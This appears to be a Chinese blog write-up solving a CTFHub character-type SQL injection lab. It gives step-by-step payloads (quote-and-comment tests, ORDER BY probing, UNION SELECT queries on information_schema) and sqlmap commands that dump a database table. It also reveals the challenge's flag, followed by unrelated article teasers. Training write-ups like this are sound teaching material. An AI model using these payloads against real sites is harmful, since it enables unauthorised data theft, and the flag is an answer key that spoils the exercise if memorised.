CTFHUB技能树之SQL——字符型注入

开启靶场,打开链接:

直接指明是SQL字符型注入,但还是来判断一下

(1)检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

(2)猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

(3)爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

(4)爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表,其中flag表是我们需要的

(5)爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

(6)爆字段内容(flag)

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag:

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下:

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/881941.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

QT--单选按钮(QRadioButton)和复选按钮(QCheckBox)

QT--单选按钮(QRadioButton)和复选按钮(QCheckBox)

在Qt中,单选按钮(QRadioButton)和复选按钮(QCheckBox)是两种常用的用户界面控件,它们的主要区别在于选择行为和用途: QRadioButton(单选按钮) 选择行为:单选…
阅读更多...
在 Rocky Linux 9.x 上安装 Docker CE

在 Rocky Linux 9.x 上安装 Docker CE

能看到这篇文章的同志们,应该是目前正在学习容器化技术或者工作中正好在使用Docker,为了让大家能提升自己的学习工作效率,根据本文章的记录来操作,相信能少走很多弯路,那就不费话了,直接开干。 开干之前&am…
阅读更多...
Gin框架操作指南01:开山篇

Gin框架操作指南01:开山篇

Gin是目前最流行,性能最好的的GoWeb框架,几乎成为了学习GoWeb必备的知识。本人最近也在学Gin,在b站搜了很多教程,发现有的教程不够详细,有的教程工具包安装有问题,而官方文档的很多示例代码又不全&#xff…
阅读更多...
抖音解压视频素材宝库

抖音解压视频素材宝库

在快节奏的生活中,解压视频成为抖音上的热门内容类型,想要制作出精彩的解压视频,优质素材必不可少。今天,为大家推荐几个超棒的抖音解压视频素材网站,让你的创作之路轻松无忧! 蛙学网 作为国内知名的短视频…
阅读更多...
Elasticsearch Suggester

Elasticsearch Suggester

Elasticsearch里设计了4 种类别的 Suggester Term Suggester:词条建议器。对给输入的文本进进行分词,为每个分词提供词项建议。Phrase Suggester:短语建议器,在term的基础上,会考量多个term之间的关系Completion Sugg…
阅读更多...
深度解析计数排序:原理、特性与应用

深度解析计数排序:原理、特性与应用

目录 💯引言 💯计数排序的原理 ⭐核心概念 ⭐工作流程 1.确定计数范围 2.统计元素出现次数 3.计算累计计数 4.放置元素到正确位置 💯计数排序的实现 ⭐代码示例(以 C 为例) ⭐时间复杂度分析 ⭐稳定性分析…
阅读更多...
patch补丁命令学习

patch补丁命令学习

1.介绍 patch 是一个 Unix/Linux 工具,用于将补丁文件应用到原始文件中,从而更新文件内容。常用于软件开发中,特别是在维护和分发软件补丁时。 2.生成和应用patch文件 2.1 diff命令 :~$ cat testfile1 Hello,This is the firstfile! :~$ …
阅读更多...
【AI学习】Mamba学习(七):HiPPO通用框架介绍

【AI学习】Mamba学习(七):HiPPO通用框架介绍

HiPPO这篇论文《HiPPO: Recurrent Memory with Optimal Polynomial Projections》,提出了一个通用框架。 我们再重新看一下论文的摘要: 从连续数据中学习的一个核心问题是,随着更多数据的处理,以增量方式表示累积历史。我们介绍了…
阅读更多...
Qt中加入UI文件

Qt中加入UI文件

将 UI 文件整合到 Qt 项目 使用 Qt Designer 创建 UI 文件: 在 Qt Creator 中使用 Qt Designer 创建 UI 文件,设计所需的界面。确保在设计中包含所需的控件(如按钮、文本框等),并为每个控件设置明确的对象名称&#xf…
阅读更多...
生信分析进阶11 - 使用IMPUTE2进行预定相和基因型填充

生信分析进阶11 - 使用IMPUTE2进行预定相和基因型填充

1. IMPUTE2进行基因型填充 软件安装参考:生信软件38 - 基因型填充软件IMPUTE2 使用IMPUTE2与参考面板的最佳方法是向程序提供所有可用的单倍型,并让它选择使用哪些单倍型。 IMPUTE2不使用群体标签或个体之间相关性的其他全基因组数据,无论是对于参考单倍型还是被填充的个…
阅读更多...
「规模焦虑」如影随形,库迪咖啡想靠便捷店突围能行吗?

「规模焦虑」如影随形,库迪咖啡想靠便捷店突围能行吗?

作者 | 辰纹 来源 | 洞见新研社 “我有一个广东的小兄弟,做了9年的奶茶,后来因为觉得咖啡是一个上升期的赛道,所以毅然决然拿了45万加盟了库迪咖啡,结果全亏损完了,相当于只买了一个配方。” 抖音博主茶饮圈大山哥分…
阅读更多...
Vite创建Vue3项目以及Vue3相关基础知识

Vite创建Vue3项目以及Vue3相关基础知识

1.创建Vue3项目 1.运行创建项目命令 # 使用 npm npm create vitelatest2、填写项目名称 3、选择前端框架 4、选择语法类型 5、按提示运行代码 不出意外的话,运行之后应该会出现 下边这个页面 6.延伸学习:对比webpack和vite(这个是面试必考…
阅读更多...
python+Mosh网课笔记01

python+Mosh网课笔记01

太久没写python代码了,学机器学习重新拾起python,笔记比较简陋。 参考:mosh的python教程 一、入门 用vscode编写代码。下载了autopep8插件用于代码格式化。下载了pylint插件用于代码报错提示。 二、基本类型 int,bool&#x…
阅读更多...
Shiro认证

Shiro认证

1. Shiro简介 Shiro是一个强大且灵活的Java安全框架,专注于认证、授权、加密、会话管理等功能,能够无缝集成到现有的应用程序中。相比Spring Security,Shiro的学习曲线较为平缓,配置简单 (1) Shiro特性 认证(Authen…
阅读更多...
节流函数throttle和防抖函数debounce

节流函数throttle和防抖函数debounce

防抖函数:用于控制函数的执行频率,n秒后再执行,一定时间内,只执行最后触发一次,若n秒内重复触发,则重新计时。应用场景: 输入框输入事件、按钮点击事件、浏览器窗口大小调整事件等,手…
阅读更多...
UI自动化测试示例:python+pytest+selenium+allure

UI自动化测试示例:python+pytest+selenium+allure

重点应用是封装、参数化: 比如在lib文件夹下,要存储封装好的方法和必要的环境变量(指网址等) 1.cfg.py:封装网址和对应的页面 SMP_ADDRESS http://127.0.0.1:8234SMP_URL_LOGIN f{SMP_ADDRESS}/login.html SMP_URL_DE…
阅读更多...
【微服务】springboot远程docker进行debug调试使用详解

【微服务】springboot远程docker进行debug调试使用详解

目录 一、前言 二、线上问题常用解决方案 2.1 微服务线上运行中常见的问题 2.2 微服务线上问题解决方案 2.3 远程debug概述 2.3.1 远程debug原理 2.3.2 远程debug优势 三、实验环境准备 3.1 搭建springboot工程 3.1.1 工程结构 3.1.2 引入基础依赖 3.1.3 添加配置文…
阅读更多...
RU 19.24 Standalone(GI和DB分开打)

RU 19.24 Standalone(GI和DB分开打)

参考文档&#xff1a;Oracle Database Patch 36582629 - GI Release Update 19.24.0.0.240716 2.1.1.1 OPatch Utility Information 12.2.0.1.42 or later 2.1.1.2 Validation of Oracle Inventory 分别在GI和Oracle Home下执行 $ <ORACLE_HOME>/OPatch/opatch lsinven…
阅读更多...
错误:SyntaxError: f-string: unmatched ‘(‘

错误:SyntaxError: f-string: unmatched ‘(‘

报错代码&#xff1a; let platformList [[${entityList}]]; 提示错误原因&#xff1a; 报错这行代码 用到了thymeleaf 解析&#xff0c;因为 html页面 不仅在头部需要引入 <html lang"en" xmlns:shiro"http://www.pollix.at/thymeleaf/shiro&qu…
阅读更多...
400行程序写一个实时操作系统(九):替换FreeRTOS的内存管理算法

400行程序写一个实时操作系统(九):替换FreeRTOS的内存管理算法

前言 通过前面几章&#xff0c;笔者带领大家完成了内存管理算法的编写。 我们完成的内存管理算法&#xff0c;被称为小内存管理算法。我们也可以将它作为一个库&#xff0c;在后续的嵌入式开发中&#xff0c;使用我们自己编写的malloc&#xff0c;不仅效率会更高&#xff0c;…
阅读更多...
最新文章

Copyright @ 2022~2023